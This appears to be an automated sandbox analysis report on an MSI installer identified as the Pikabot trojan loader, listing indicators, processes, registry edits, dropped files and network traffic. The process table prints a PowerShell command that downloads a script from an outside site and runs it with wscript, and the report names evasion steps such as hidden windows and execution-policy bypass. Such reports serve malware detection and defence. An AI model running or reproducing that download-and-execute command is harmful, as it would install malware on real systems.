| File name: | 38MirrorsConnectionAgent.msi |
| Full analysis: | https://app.any.run/tasks/2882d6ad-bdec-4662-9dbb-30275989f854 |
| Verdict: | Malicious activity |
| Threats: | Pikabot is a trojan malware with a focus on loader capabilities. Pikabot is also used for other activities, such as executing commands on the infected system. The earlier versions of the malware made use of extensive code obfuscation to evade detection. Upon infection, it collects system information and sends it to command-and-control servers. |
| Analysis date: | January 31, 2024, 19:42:15 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-msi |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: MirrorsConnectionAgent, Author: admin, Keywords: Installer, Comments: This installer database contains the logic and data required to install MirrorsConnectionAgent., Template: Intel;1033, Revision Number: {18E2456B-A895-418C-B15E-3CA510EB5D94}, Create Time/Date: Fri Jan 19 13:14:34 2024, Last Saved Time/Date: Fri Jan 19 13:14:34 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2 |
| MD5: | 5E373E93963D811DDD4A5D4FB4BA0FE5 |
| SHA1: | F7E723A6CDB05382C4096F07E703648413BA6F6C |
| SHA256: | 6DF1CDA132D06E5CC00D6D8D88DFA8ED2DEA8C036225D505008CD842A4DE378C |
| SSDEEP: | 49152:BeCNMZwx2Sz5lb30T+ICrbjfKlBb7/nSej8ApoqNwDabaoFSCmNnPapAk:lNbxRz5FkJCrbjfGhN6xoFSNNipAk |
MALICIOUS
Drops the executable file immediately after the start
- msiexec.exe (PID: 3648)
- msiexec.exe (PID: 872)
Pikabot has been detected
- rundll32.exe (PID: 5380)
- rundll32.exe (PID: 2652)
- rundll32.exe (PID: 6196)
Run PowerShell with an invisible window
- powershell.exe (PID: 6184)
Bypass execution policy to execute commands
- powershell.exe (PID: 6184)
Changes powershell execution policy (Bypass)
- rundll32.exe (PID: 2652)
Accesses environment variables (SCRIPT)
- wscript.exe (PID: 6212)
Gets TEMP folder path (SCRIPT)
- wscript.exe (PID: 6212)
Copies file to a new location (SCRIPT)
- wscript.exe (PID: 6212)
Deletes a file (SCRIPT)
- wscript.exe (PID: 6212)
SUSPICIOUS
Reads the date of Windows installation
- msiexec.exe (PID: 3648)
The process creates files with name similar to system file names
- rundll32.exe (PID: 5380)
- powershell.exe (PID: 5272)
- msiexec.exe (PID: 3648)
Executable content was dropped or overwritten
- rundll32.exe (PID: 5380)
- rundll32.exe (PID: 2652)
- rundll32.exe (PID: 6196)
Starts POWERSHELL.EXE for commands execution
- rundll32.exe (PID: 2652)
- powershell.exe (PID: 6184)
- wscript.exe (PID: 6212)
The process executes Powershell scripts
- rundll32.exe (PID: 2652)
- wscript.exe (PID: 6212)
Unusual connection from system programs
- powershell.exe (PID: 6184)
- powershell.exe (PID: 5272)
- powershell.exe (PID: 6728)
Connects to unusual port
- powershell.exe (PID: 6184)
The Powershell connects to the Internet
- powershell.exe (PID: 6184)
- powershell.exe (PID: 5272)
- powershell.exe (PID: 6728)
Application launched itself
- powershell.exe (PID: 6184)
The process executes JS scripts
- powershell.exe (PID: 5272)
Creates FileSystem object to access computer's file system (SCRIPT)
- wscript.exe (PID: 6212)
Gets name of the script (SCRIPT)
- wscript.exe (PID: 6212)
Gets full path of the running script (SCRIPT)
- wscript.exe (PID: 6212)
Checks whether a specific file exists (SCRIPT)
- wscript.exe (PID: 6212)
Runs shell command (SCRIPT)
- wscript.exe (PID: 6212)
Possibly malicious use of IEX has been detected
- wscript.exe (PID: 6212)
The process checks if it is being run in the virtual environment
- powershell.exe (PID: 6728)
Connects to the server without a host name
- powershell.exe (PID: 6728)
Reads the Windows owner or organization settings
- msiexec.exe (PID: 872)
INFO
Reads the computer name
- msiexec.exe (PID: 872)
- msiexec.exe (PID: 3648)
- msiexec.exe (PID: 6856)
Create files in a temporary directory
- msiexec.exe (PID: 2580)
- msiexec.exe (PID: 3648)
An automatically generated document
- msiexec.exe (PID: 2580)
Checks supported languages
- msiexec.exe (PID: 872)
- msiexec.exe (PID: 3648)
- msiexec.exe (PID: 6856)
Drops the executable file immediately after the start
- msiexec.exe (PID: 2580)
- rundll32.exe (PID: 5380)
- rundll32.exe (PID: 2652)
- rundll32.exe (PID: 6196)
Executable content was dropped or overwritten
- msiexec.exe (PID: 2580)
- msiexec.exe (PID: 3648)
- msiexec.exe (PID: 872)
Reads the machine GUID from the registry
- msiexec.exe (PID: 3648)
Process checks computer location settings
- msiexec.exe (PID: 3648)
Creates files or folders in the user directory
- rundll32.exe (PID: 5380)
- msiexec.exe (PID: 3648)
Checks proxy server information
- powershell.exe (PID: 6184)
- powershell.exe (PID: 5272)
- powershell.exe (PID: 6728)
- slui.exe (PID: 3964)
Reads the software policy settings
- slui.exe (PID: 2196)
- slui.exe (PID: 3964)
Creates files in the program directory
- wscript.exe (PID: 6212)
Application launched itself
- msiexec.exe (PID: 3648)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .msi | | | Microsoft Windows Installer (98.5) |
|---|---|---|
| .msi | | | Microsoft Installer (100) |
EXIF
FlashPix
| CodePage: | Windows Latin 1 (Western European) |
|---|---|
| Title: | Installation Database |
| Subject: | MirrorsConnectionAgent |
| Author: | admin |
| Keywords: | Installer |
| Comments: | This installer database contains the logic and data required to install MirrorsConnectionAgent. |
| Template: | Intel;1033 |
| RevisionNumber: | {18E2456B-A895-418C-B15E-3CA510EB5D94} |
| CreateDate: | 2024:01:19 13:14:34 |
| ModifyDate: | 2024:01:19 13:14:34 |
| Pages: | 200 |
| Words: | 2 |
| Software: | Windows Installer XML Toolset (3.11.2.4516) |
| Security: | Read-only recommended |
Total processes
169
Monitored processes
18
Malicious processes
10
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 872 | C:\WINDOWS\system32\msiexec.exe /V | C:\Windows\System32\msiexec.exe | services.exe | ||||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Exit code: 0 Version: 5.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1376 | C:\WINDOWS\system32\SppExtComObj.exe -Embedding | C:\Windows\System32\SppExtComObj.Exe | — | svchost.exe | |||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: KMS Connection Broker Exit code: 0 Version: 10.0.19041.1202 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1920 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2196 | "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent | C:\Windows\System32\slui.exe | SppExtComObj.Exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Activation Client Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2580 | "C:\Windows\System32\msiexec.exe" /i "C:\Users\admin\Downloads\38MirrorsConnectionAgent.msi" | C:\Windows\System32\msiexec.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 1602 Version: 5.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2652 | rundll32.exe "C:\WINDOWS\Installer\MSID337.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_1037140 11 WixSharp!WixSharp.ManagedProjectActions.WixSharp_AfterInstall_Action | C:\Windows\SysWOW64\rundll32.exe | msiexec.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows host process (Rundll32) Exit code: 0 Version: 10.0.19041.746 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3648 | C:\Windows\syswow64\MsiExec.exe -Embedding CD1B047BFDEDDFA3A26C23CC2FCFD8CC U | C:\Windows\SysWOW64\msiexec.exe | msiexec.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3964 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5252 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5272 | "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -Command IWR -UseBasicParsing -Uri 'https://www.fuchs.com.sd/media/media/js/wp-content.php' -OutFile $env:temp\upd579.js; wscript $env:temp\upd579.js | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
18 110
Read events
18 069
Write events
34
Delete events
7
Modification events
| (PID) Process: | (3648) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (3648) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (3648) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (3648) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (872) msiexec.exe | Key: | HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001_Classes\Local Settings\MuiCache\28\52C64B7E |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (872) msiexec.exe | Key: | HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001_Classes\Local Settings\MuiCache\28 |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (872) msiexec.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts |
| Operation: | delete value | Name: | C:\Config.Msi\fd1a1.rbs |
Value: 31085693 | |||
| (PID) Process: | (872) msiexec.exe | Key: | HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\RestartManager\Session0000 |
| Operation: | delete value | Name: | Sequence |
Value: 1 | |||
| (PID) Process: | (872) msiexec.exe | Key: | HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\RestartManager\Session0000 |
| Operation: | delete value | Name: | SessionHash |
Value: F210AC8E8BA196337BBA8408F13CFB7029921B8A55E4E1912E1B14AA2158D16C | |||
| (PID) Process: | (872) msiexec.exe | Key: | HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\RestartManager\Session0000 |
| Operation: | delete value | Name: | Owner |
Value: 680300004F08B29F7D54DA01 | |||
Executable files
23
Suspicious files
20
Text files
19
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3648 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\MSI18966\Microsoft.Deployment.WindowsInstaller.dll | executable | |
MD5:82EB1CCF28F3AF897C2DB27282B41156 | SHA256:CED6CAB3C04C08CE5705AF0B6986965DBDBFDA17CBD66C973BB371ED3B95F37A | |||
| 3648 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\MSI18966\WixSharp.UI.dll | executable | |
MD5:A8D11EE5C3DCC54D8082FD2C087C7977 | SHA256:C29D2AEB1DE17211ADB98A490051D83BFD05D10AF66094EF7159D0917BAD35CB | |||
| 2580 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\MSI18966\WixSharp.UI.CA.dll | executable | |
MD5:4EC3B1DDA997B099CB2388536541B08A | SHA256:208D0DBC4DA92BC1FB1CA9E2020FF4A4DF3EDB595BA1D99AD55D429938485388 | |||
| 3648 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\MSI18966\WixSharp.dll | executable | |
MD5:02551708742C3E7BADEE72532C9484B7 | SHA256:0FC8EDC2B0BF3B92AB50C08429B03F7612FE1FE2E1216A4D9266F11058E3E95F | |||
| 3648 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\MSI18966\EmbeddedUI.config | xml | |
MD5:C9C40AF1656F8531EAA647CACEB1E436 | SHA256:1A67F60962CA1CBF19873B62A8518EFE8C701A09CD609AF4C50ECC7F0B468BB8 | |||
| 5380 | rundll32.exe | C:\WINDOWS\Installer\MSID1FC.tmp-\WixSharp.dll | executable | |
MD5:02551708742C3E7BADEE72532C9484B7 | SHA256:0FC8EDC2B0BF3B92AB50C08429B03F7612FE1FE2E1216A4D9266F11058E3E95F | |||
| 5380 | rundll32.exe | C:\WINDOWS\Installer\MSID1FC.tmp-\Microsoft.Deployment.WindowsInstaller.dll | executable | |
MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA | SHA256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA | |||
| 872 | msiexec.exe | C:\WINDOWS\Installer\inprogressinstallinfo.ipi | binary | |
MD5:AD646D317A0CF303C1F2B79B00FC01DC | SHA256:B1093BAB5C5D262E3FF0859730C8408C1115B22C88E91CB8056A3AFE7C12C0B8 | |||
| 5380 | rundll32.exe | C:\WINDOWS\Installer\MSID1FC.tmp-\ConsoleApp2.exe | executable | |
MD5:29D6261E0AFDD28DE534140B864E7AA8 | SHA256:BFAC55BBBC160926FB55AFF5FC7786E161E71480DF70220C1BD13D7F33EDE8CB | |||
| 5380 | rundll32.exe | C:\Users\admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log | binary | |
MD5:2D3001B09823934D193B7D7C9403FF11 | SHA256:4B211ACD024231B35716567A9F08042915207EBE5A56A601B4B88072BAD93EB0 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
55
TCP/UDP connections
59
DNS requests
35
Threats
2
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
1612 | svchost.exe | GET | 200 | 23.216.77.42:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | binary | 1.11 Kb | unknown |
1092 | svchost.exe | POST | 302 | 23.35.234.120:80 | http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409 | unknown | — | — | unknown |
1612 | svchost.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | binary | 814 b | unknown |
2176 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | binary | 418 b | unknown |
2176 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | binary | 409 b | unknown |
6792 | svchost.exe | HEAD | 200 | 23.44.215.49:80 | http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/873489b1-33b2-480a-baa2-641b9e09edcd?P1=1707187847&P2=404&P3=2&P4=RyrufO6I2HjV0Gx1McP3jRdu9T%2fsmJjBzWNafj6uVDiJ4Jhk1gQwuJ4Vzm8%2bdqpj0k%2bNgDri6CB4n7W1CdWqBg%3d%3d | unknown | — | — | unknown |
4956 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | binary | 471 b | unknown |
1092 | svchost.exe | POST | 302 | 23.35.234.120:80 | http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409 | unknown | — | — | unknown |
6792 | svchost.exe | GET | 206 | 23.44.215.49:80 | http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/873489b1-33b2-480a-baa2-641b9e09edcd?P1=1707187847&P2=404&P3=2&P4=RyrufO6I2HjV0Gx1McP3jRdu9T%2fsmJjBzWNafj6uVDiJ4Jhk1gQwuJ4Vzm8%2bdqpj0k%2bNgDri6CB4n7W1CdWqBg%3d%3d | unknown | binary | 1.09 Kb | unknown |
6792 | svchost.exe | GET | 206 | 23.44.215.49:80 | http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/873489b1-33b2-480a-baa2-641b9e09edcd?P1=1707187847&P2=404&P3=2&P4=RyrufO6I2HjV0Gx1McP3jRdu9T%2fsmJjBzWNafj6uVDiJ4Jhk1gQwuJ4Vzm8%2bdqpj0k%2bNgDri6CB4n7W1CdWqBg%3d%3d | unknown | binary | 9.62 Kb | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3720 | svchost.exe | 239.255.255.250:1900 | — | — | — | unknown |
6492 | msedge.exe | 13.107.42.16:443 | config.edge.skype.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
5612 | MoUsoCoreWorker.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1612 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1612 | svchost.exe | 23.216.77.42:80 | crl.microsoft.com | Akamai International B.V. | DE | unknown |
1612 | svchost.exe | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
4956 | svchost.exe | 40.126.31.67:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
1092 | svchost.exe | 23.35.234.120:80 | go.microsoft.com | AKAMAI-AS | DE | unknown |
1092 | svchost.exe | 20.231.121.79:80 | dmd.metaservices.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown |
2176 | SIHClient.exe | 20.12.23.50:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
config.edge.skype.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
login.live.com |
| whitelisted |
go.microsoft.com |
| whitelisted |
dmd.metaservices.microsoft.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
edge.microsoft.com |
| whitelisted |
msedge.b.tlu.dl.delivery.mp.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
6184 | powershell.exe | Misc Attack | ET DROP Spamhaus DROP Listed Traffic Inbound group 15 |
6184 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |